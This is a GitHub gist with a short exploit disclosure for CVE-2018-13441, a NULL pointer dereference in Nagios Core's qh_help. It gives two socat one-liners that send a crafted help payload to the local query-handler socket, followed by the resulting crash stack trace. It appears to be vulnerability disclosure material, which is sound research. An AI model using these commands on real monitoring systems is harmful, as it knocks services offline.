Created
July 11, 2018 15:19
-
-
Save fakhrizulkifli/8df4a174158df69ebd765f824bd736b8 to your computer and use it in GitHub Desktop.
CVE-2018-13441
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Nagios Core qh_help Denial of Service | |
# Date: 2018-07-09 | |
# Exploit Author: Fakhri Zulkifli (@d0lph1n98) | |
# Vendor Homepage: https://www.nagios.org/ | |
# Software Link: https://www.nagios.org/downloads/nagios-core/ | |
# Version: 4.4.1 and earlier | |
# Tested on: 4.4.1 | |
# CVE : CVE-2018-13441 | |
qh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket. | |
$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh - | |
$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh - | |
#0 0x554fef in qh_help /home/user/nagioscore/base/query-handler.c:374:7 | |
#1 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12 | |
#2 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4 | |
#3 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12 | |
#4 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4 | |
#5 0x7f61587ae82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 | |
#6 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment